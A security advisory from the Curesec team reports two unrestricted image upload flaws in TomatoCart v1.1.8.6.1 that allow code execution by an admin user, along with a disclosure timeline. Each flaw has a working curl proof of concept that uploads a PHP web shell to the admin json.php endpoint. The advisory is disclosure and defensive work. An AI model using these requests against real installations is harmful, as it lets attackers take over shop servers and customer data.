TomatoCart v1.1.8.6.1: Code Execution
Date: 2015-11-13 11:34:03
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: |
TomatoCart v1.1.8.6.1 |
Fixed in: |
not fixed |
Fixed Version Link: |
n/a |
Vendor Contact: |
support@tomatocart.com |
Vulnerability Type: |
Code Execution |
Remote Exploitable: |
Yes |
Reported to vendor: |
09/29/2015 |
Disclosed to public: |
11/13/2015 |
Release mode: |
Full Disclosure |
CVE: |
n/a |
Credits |
Tim Coen of curesec GmbH |
2. Overview
TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution.
Please note that an admin account with at least some privileges is required to exploit this issue.
3. Code Execution 1
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution.
The rights needed are Content -> Slide Images.
Proof of Concept
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1106460043' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"module\"\x0d\x0a\x0d\x0aslide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0asave_slide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1106460043--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'
3. Code Execution 2
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a new product image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution.
The rights needed are Content -> Products.
Proof of Concept
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1775010584' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"path\"\x0d\x0a\x0d\x0a\x0d\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"cmd\"\x0d\x0a\x0d\x0aupload\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"dir\"\x0d\x0a\x0d\x0a.\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1775010584--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
09/29/2015 |
Informed Vendor about Issue (no reply) |
10/21/2015 |
Reminded Vendor of Disclosure Date (no reply) |
11/13/2015 |
Disclosed to public |